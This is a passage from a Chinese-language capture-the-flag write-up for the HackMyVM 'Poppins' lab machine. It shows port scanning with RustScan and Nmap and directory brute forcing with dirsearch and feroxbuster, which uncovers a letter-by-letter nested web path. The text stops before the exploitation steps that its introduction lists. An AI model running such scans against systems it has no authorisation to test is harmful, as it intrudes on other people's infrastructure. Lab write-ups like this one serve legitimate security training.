HackMyVM-Poppins

あれから世界は 変(か)わったって
從那時候起世界就改變了
本気で思ったって
即使我真的是那樣認為
期待したって 変えようとし たって
但就算再怎期待再怎想要改變
未来は残酷で
未來卻是殘酷的
それでも いつだって 君と見ていた
即便如此總是與你一同凝望的
世界は本当に綺麗だった
這世界真是美妙

---

靶机ip：192.168.56.252

难度：中等

涉及内容：OpenSSH 侧信道用户枚举 (SSH User Enumeration)，Python 自动化渗透脚本编写，Sudo 权限滥用 (GTFOBins: Mail)，Ansible 自动化工具提权

---

端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 192.168.56.252
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.56.252:22
Open 192.168.56.252:80
Open 192.168.56.252:110
Open 192.168.56.252:995
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 02:07 -0500
Initiating ARP Ping Scan at 02:07
Scanning 192.168.56.252 [1 port]
Completed ARP Ping Scan at 02:07, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:07
Completed Parallel DNS resolution of 1 host. at 02:07, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:07
Scanning 192.168.56.252 [4 ports]
Discovered open port 80/tcp on 192.168.56.252
Discovered open port 22/tcp on 192.168.56.252
Discovered open port 110/tcp on 192.168.56.252
Discovered open port 995/tcp on 192.168.56.252
Completed SYN Stealth Scan at 02:07, 0.02s elapsed (4 total ports)
Nmap scan report for 192.168.56.252
Host is up, received arp-response (0.00088s latency).
Scanned at 2026-02-04 02:07:41 EST for 0s

PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 64
80/tcp  open  http    syn-ack ttl 64
110/tcp open  pop3    syn-ack ttl 64
995/tcp open  pop3s   syn-ack ttl 64
MAC Address: 08:00:27:78:88:97 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

细节探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 192.168.56.252 -- -sV -sC -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.56.252:22
Open 192.168.56.252:80
Open 192.168.56.252:110
Open 192.168.56.252:995
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC -A" on ip 192.168.56.252
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 02:08 -0500
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
Initiating ARP Ping Scan at 02:08
Scanning 192.168.56.252 [1 port]
Completed ARP Ping Scan at 02:08, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:08
Completed Parallel DNS resolution of 1 host. at 02:08, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 02:08
Scanning 192.168.56.252 [4 ports]
Discovered open port 22/tcp on 192.168.56.252
Discovered open port 80/tcp on 192.168.56.252
Discovered open port 995/tcp on 192.168.56.252
Discovered open port 110/tcp on 192.168.56.252
Completed SYN Stealth Scan at 02:08, 0.03s elapsed (4 total ports)
Initiating Service scan at 02:08
Scanning 4 services on 192.168.56.252
Completed Service scan at 02:08, 12.19s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.252
NSE: Script scanning 192.168.56.252.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 1.76s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
Nmap scan report for 192.168.56.252
Host is up, received arp-response (0.0051s latency).
Scanned at 2026-02-04 02:08:30 EST for 17s

PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
80/tcp  open  http     syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-title: Mary Poppins - A Timeless Classic
|_http-server-header: Apache/2.4.62 (Debian)
110/tcp open  pop3     syn-ack ttl 64 Dovecot pop3d
| ssl-cert: Subject: commonName=Poppies
| Subject Alternative Name: DNS:Poppies
| Issuer: commonName=Poppies
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-29T16:42:33
| Not valid after:  2035-08-27T16:42:33
| MD5:     77a4 3355 7780 8886 3706 4aa3 6317 3e10
| SHA-1:   7b74 675a 7bf9 4740 a85d 7414 5e36 e2a3 c7d8 22be
| SHA-256: f3a5 35e4 8b5f a50f b511 ca2d 9dfb 5c8c 816d eb7b 8d1f e838 adac 97a7 62fb 283a
| -----BEGIN CERTIFICATE-----
| MIIDGTCCAgGgAwIBAgIUNc/f4xh9d2/jrzrOi7sBnHVjYw0wDQYJKoZIhvcNAQEL
| BQAwEjEQMA4GA1UEAwwHUG9wcGllczAeFw0yNTA4MjkxNjQyMzNaFw0zNTA4Mjcx
| NjQyMzNaMBIxEDAOBgNVBAMMB1BvcHBpZXMwggEiMA0GCSqGSIb3DQEBAQUAA4IB
| DwAwggEKAoIBAQC/VRuM4hUKOTjO8eYweSq9LW9LvwReUvNbxAv8CnQhIxVuuhXZ
| QWWRnLtRVeNqMerqmtP9hzLFJCPvbZ37lsZcgFYbYP6nvhhEB/TIUun4hLNxLfDL
| AKHuavEaZl3fVEra/qVpSkks2SLHMGvrS8ceCVRB8ByYVbGhKwywm2dcefla4fxT
| 9J5bJl3+wJxCmU2LKw/+OB0fAdoBKBRS2gWdQZKS17HS71m1a3qI5IvA71x2uhrQ
| OOfj8V7zj0HpnDIgmQiYOy6blHgrNQwYTvDnjknhUXyNVa97K3bGe+ytWZKaPUAU
| ukBPN4uzlME1ov54PEHV4JvbHHI31+o2BeXxAgMBAAGjZzBlMB0GA1UdDgQWBBTw
| RKSeUAtt4EyUhF2x6/TXDXRgLzAfBgNVHSMEGDAWgBTwRKSeUAtt4EyUhF2x6/TX
| DXRgLzAPBgNVHRMBAf8EBTADAQH/MBIGA1UdEQQLMAmCB1BvcHBpZXMwDQYJKoZI
| hvcNAQELBQADggEBAHve9/6m+XMLlqFeM1BlCTVD43fG/rvDPhDljFP5gVY54DDS
| Jdv4M7LS19zsSjCHYg4inhyY+rgThg8+aVMdihr82b9yrVJbCvQwtOh631z6psen
| m2TpeKZFLJQrW4GxNtzAKTYlmvQqPBIul7WsHYz1x0J/v2PIGVL+xTKBHOJZZ4P6
| 6ITASTDwHeKMMxE+aIVAS3+BTMuaXEjSSvpie8t0riuUjaX3FQGUAtKSOtGJyc8k
| pEsLq+w2HcOXf13m4seNfy7uF9lVw+YqPLxxhf9rv1bLfP76zU+yZSF9LtMpmvwo
| gnHh4R+ejI7CpsWdMGhQH5bfyn+SRmmZ042i2s0=
|_-----END CERTIFICATE-----
|_pop3-capabilities: PIPELINING SASL(PLAIN) TOP USER UIDL AUTH-RESP-CODE RESP-CODES CAPA STLS
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3 syn-ack ttl 64 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) PIPELINING USER UIDL TOP AUTH-RESP-CODE RESP-CODES CAPA
| ssl-cert: Subject: commonName=Poppies
| Subject Alternative Name: DNS:Poppies
| Issuer: commonName=Poppies
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-29T16:42:33
| Not valid after:  2035-08-27T16:42:33
| MD5:     77a4 3355 7780 8886 3706 4aa3 6317 3e10
| SHA-1:   7b74 675a 7bf9 4740 a85d 7414 5e36 e2a3 c7d8 22be
| SHA-256: f3a5 35e4 8b5f a50f b511 ca2d 9dfb 5c8c 816d eb7b 8d1f e838 adac 97a7 62fb 283a
| -----BEGIN CERTIFICATE-----
| MIIDGTCCAgGgAwIBAgIUNc/f4xh9d2/jrzrOi7sBnHVjYw0wDQYJKoZIhvcNAQEL
| BQAwEjEQMA4GA1UEAwwHUG9wcGllczAeFw0yNTA4MjkxNjQyMzNaFw0zNTA4Mjcx
| NjQyMzNaMBIxEDAOBgNVBAMMB1BvcHBpZXMwggEiMA0GCSqGSIb3DQEBAQUAA4IB
| DwAwggEKAoIBAQC/VRuM4hUKOTjO8eYweSq9LW9LvwReUvNbxAv8CnQhIxVuuhXZ
| QWWRnLtRVeNqMerqmtP9hzLFJCPvbZ37lsZcgFYbYP6nvhhEB/TIUun4hLNxLfDL
| AKHuavEaZl3fVEra/qVpSkks2SLHMGvrS8ceCVRB8ByYVbGhKwywm2dcefla4fxT
| 9J5bJl3+wJxCmU2LKw/+OB0fAdoBKBRS2gWdQZKS17HS71m1a3qI5IvA71x2uhrQ
| OOfj8V7zj0HpnDIgmQiYOy6blHgrNQwYTvDnjknhUXyNVa97K3bGe+ytWZKaPUAU
| ukBPN4uzlME1ov54PEHV4JvbHHI31+o2BeXxAgMBAAGjZzBlMB0GA1UdDgQWBBTw
| RKSeUAtt4EyUhF2x6/TXDXRgLzAfBgNVHSMEGDAWgBTwRKSeUAtt4EyUhF2x6/TX
| DXRgLzAPBgNVHRMBAf8EBTADAQH/MBIGA1UdEQQLMAmCB1BvcHBpZXMwDQYJKoZI
| hvcNAQELBQADggEBAHve9/6m+XMLlqFeM1BlCTVD43fG/rvDPhDljFP5gVY54DDS
| Jdv4M7LS19zsSjCHYg4inhyY+rgThg8+aVMdihr82b9yrVJbCvQwtOh631z6psen
| m2TpeKZFLJQrW4GxNtzAKTYlmvQqPBIul7WsHYz1x0J/v2PIGVL+xTKBHOJZZ4P6
| 6ITASTDwHeKMMxE+aIVAS3+BTMuaXEjSSvpie8t0riuUjaX3FQGUAtKSOtGJyc8k
| pEsLq+w2HcOXf13m4seNfy7uF9lVw+YqPLxxhf9rv1bLfP76zU+yZSF9LtMpmvwo
| gnHh4R+ejI7CpsWdMGhQH5bfyn+SRmmZ042i2s0=
|_-----END CERTIFICATE-----
MAC Address: 08:00:27:78:88:97 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=2/4%OT=22%CT=%CU=32550%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:6982F07F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 27.906 days (since Wed Jan  7 04:24:41 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   5.12 ms 192.168.56.252

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:08
Completed NSE at 02:08, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds
           Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)

除22，80端口以外开放了不常见的邮件端口，尝试nc连接，但是需要登录，暂时不知道用户名。

目录爆破

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u 192.168.56.252
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/_192.168.56.252/_26-02-04_02-12-49.txt

Target: http://192.168.56.252/

[02:12:49] Starting:                                                                                                                                       
[02:12:50] 403 -  279B  - /.ht_wsr.txt                                      
[02:12:50] 403 -  279B  - /.htaccess.bak1                                   
[02:12:50] 403 -  279B  - /.htaccess.orig                                   
[02:12:50] 403 -  279B  - /.htaccess.sample                                 
[02:12:50] 403 -  279B  - /.htaccess.save
[02:12:50] 403 -  279B  - /.htaccess_extra                                  
[02:12:50] 403 -  279B  - /.htaccessBAK
[02:12:50] 403 -  279B  - /.htaccess_orig
[02:12:50] 403 -  279B  - /.htaccess_sc
[02:12:50] 403 -  279B  - /.htaccessOLD
[02:12:50] 403 -  279B  - /.htaccessOLD2                                    
[02:12:50] 403 -  279B  - /.html                                            
[02:12:50] 403 -  279B  - /.htm
[02:12:50] 403 -  279B  - /.htpasswd_test                                   
[02:12:50] 403 -  279B  - /.httr-oauth                                      
[02:12:50] 403 -  279B  - /.htpasswds                                       
[02:12:50] 403 -  279B  - /.php                                             
[02:13:07] 301 -  312B  - /s  ->  http://192.168.56.252/s/                  
[02:13:08] 403 -  279B  - /server-status/                                   
[02:13:08] 403 -  279B  - /server-status
                                                                  

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# feroxbuster -u http://192.168.56.252/s/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 7z,pem,001,php,zip,txt,html,htm --scan-dir-listings  -C 503,404
                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.252/s
 🚩  In-Scope Url          │ 192.168.56.252
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [503, 404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 📂  Scan Dir Listings     │ true
 💲  Extensions            │ [7z, pem, 001, php, zip, txt, html, htm]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      312c http://192.168.56.252/s => http://192.168.56.252/s/
301      GET        9l       28w      314c http://192.168.56.252/s/u => http://192.168.56.252/s/u/
301      GET        9l       28w      316c http://192.168.56.252/s/u/p => http://192.168.56.252/s/u/p/
301      GET        9l       28w      318c http://192.168.56.252/s/u/p/e => http://192.168.56.252/s/u/p/e/
301      GET        9l       28w      320c http://192.168.56.252/s/u/p/e/r => http://192.168.56.252/s/u/p/e/r/
[>-------------------] - 77s   148926/7939872 63m     found:5       errors:4      
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_192_168_56_252_s-1770189345.state ...
[>-------------------] - 77s   148959/7939872 63m     found:5       errors:4      
[>-------------------] - 77s    49194/1984914 642/s   http://192.168.56.252/s/ 
[>-------------------] - 73s    39015/1984914 531/s   http://192.168.56.252/s/u/ 
[>-------------------] - 69s    33102/1984914 482/s   http://192.168.56.252/s/u/p/ 
[>-------------------] - 58s    26577/1984914 455/s   http://192.168.56.252/s/u/p/e/       

这里有个目录名非常奇怪，/s/u/p/e，合理怀疑是自己拼接的目录名，后面会构成一个单词用/当分隔符的目录。

构建字典

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# printf '%s\n' {a..z} >> a.txt

目录递归爆破

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# feroxbuster -u http://192.168.56.252/s/ -w /home/kali/Desktop/a.txt -x 7z,bak,pem,001,php,zip,txt,html,htm --scan-dir-listings  -C 503,404 --depth=99999    
                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.252/s
 🚩  In-Scope Url          │ 192.168.56.252
 🚀  Threads               │ 50
 📖  Wordlist              │ /home/kali/Desktop/a.txt
 💢  Status Code Filters   │ [503, 404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 📂  Scan Dir Listings     │ true
 💲  Extensions            │ [7z, bak, pem, 001, php, zip, txt, html, htm]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 99999
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      312c http://192.168.56.252/s => http://192.168.56.252/s/
301      GET        9l       28w      314c http://192.168.56.252/s/u => http://192.168.56.252/s/u/
301      GET        9l       28w      316c http://192.168.56.252/s/u/p => http://192.168.56.252/s/u/p/
301      GET        9l       28w      318c http://192.168.56.252/s/u/p/e => http://192.168.56.252/s/u/p/e/
301      GET        9l       28w      320c http://192.168.56.252/s/u/p/e/r => http://192.168.56.252/s/u/p/e/r/
301      GET        9l       28w      322c http://192.168.56.252/s/u/p/e/r/c => http://192.168.56.252/s/u/p/e/r/c/
301      GET        9l       28w      324c http://192.168.56.252/s/u/p/e/r/c/a => http://192.168.56.252/s/u/p/e/r/c/a/
301      GET        9l       28w      326c http://192.168.56.252/s/u/p/e/r/c/a/l => http://192.168.56.252/s/u/p/e/r/c/a/l/
301      GET        9l       28w      328c http://192.168.56.252/s/u/p/e/r/c/a/l/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/
301      GET        9l       28w      330c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/
301      GET        9l       28w      332c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/
301      GET        9l       28w      334c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/
301      GET        9l       28w      336c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/
301      GET        9l       28w      338c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/
301      GET        9l       28w      340c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/
301      GET        9l       28w      342c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/
301      GET        9l       28w      344c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/
301      GET        9l       28w      348c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/
301      GET        9l       28w      350c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/
301      GET        9l       28w      346c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/
301      GET        9l       28w      354c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/
301      GET        9l       28w      356c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/
301      GET        9l       28w      352c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/
301      GET        9l       28w      362c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/
301      GET        9l       28w      364c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/
301      GET        9l       28w      358c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/
301      GET        9l       28w      366c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/
301      GET        9l       28w      368c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/
301      GET        9l       28w      370c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/
301      GET        9l       28w      360c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/
301      GET        9l       28w      372c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/
301      GET        9l       28w      374c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/
301      GET        9l       28w      376c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/
